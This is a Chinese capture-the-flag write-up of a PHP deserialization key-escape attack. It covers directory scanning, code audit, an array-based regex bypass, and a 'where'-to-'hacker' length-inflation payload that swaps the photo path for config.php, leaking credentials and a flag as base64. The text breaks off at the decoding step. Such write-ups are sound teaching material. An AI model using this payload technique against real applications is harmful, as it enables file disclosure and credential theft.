打开环境,sql注入各种测试,不是
使用工具dirsearch扫描目录,扫到文件www.zip,下载下来
使用工具Seay PHP代码审计工具 审计代码:
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
发现反序列化。
仔细研究代码,发现flag在config.php中
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
通过分析代码,
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
可以通过nickname
来控制photo
的值,从而造成逃逸(反序列化漏洞——键值逃逸)
<?php
$profile['phone'] = '13500000000';
$profile['email'] = '123@qq.com';
$profile['nickname'] = 'hello';
$profile['photo'] = 'upload/' . md5('12345');
echo serialize($profile);
?>
a:4:{s:5:"phone";s:11:"13500000000";s:5:"email";s:10:"123@qq.com";s:8:"nickname";s:5:"hello";s:5:"photo";s:39:"upload/827ccb0eea8a706c4c34a16891f84e7b";}
用数组绕过nickname的正则过滤,即nickname[]
<?php
$profile['phone'] = '13500000000';
$profile['email'] = '123@qq.com';
$profile['nickname'] = ['hello'];
$profile['photo'] = 'upload/' . md5('12345');
echo serialize($profile);
?>
a:4:{s:5:"phone";s:11:"13500000000";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:5:"hello";}s:5:"photo";s:39:"upload/827ccb0eea8a706c4c34a16891f84e7b";}
要将photo的内容替换成config.php,我们的想法就是要插入";}s:5:"photo";s:10:"config.php";},一共34个字符,要逃逸成功只需要长度增加34,把我们的目标给挤出去就行了,这里正好利用filter来将长度增长,假如我传入 where,那么被替换以后就是 hacker,长度增加了1,一共是34个 where
payload
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}
后序列化内容
a:4:{s:5:"phone";s:11:"13500000000";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}s:39:"upload/827ccb0eea8a706c4c34a16891f84e7b";}
回到题目:
在register.php页面注册一个账号,然后登录,到了上传页面,burpsuit抓包
提交,有错,nickname过滤绕过:使用数组nickname[]
查看页面profile.php:
按F12看源码
data:image/gif;base64,PD9waHAKJGNvbmZpZ1snaG9zdG5hbWUnXSA9ICcxMjcuMC4wLjEnOwokY29uZmlnWyd1c2VybmFtZSddID0gJ3Jvb3QnOwokY29uZmlnWydwYXNzd29yZCddID0gJ3F3ZXJ0eXVpb3AnOwokY29uZmlnWydkYXRhYmFzZSddID0gJ2NoYWxsZW5nZXMnOwokZmxhZyA9ICdmbGFnezQ3NDIyMjhjLTlhMDItNGEyMy1iMDdkLTc5NGZjMGE2YjlmMX0nOwo/Pgo=
base64解码: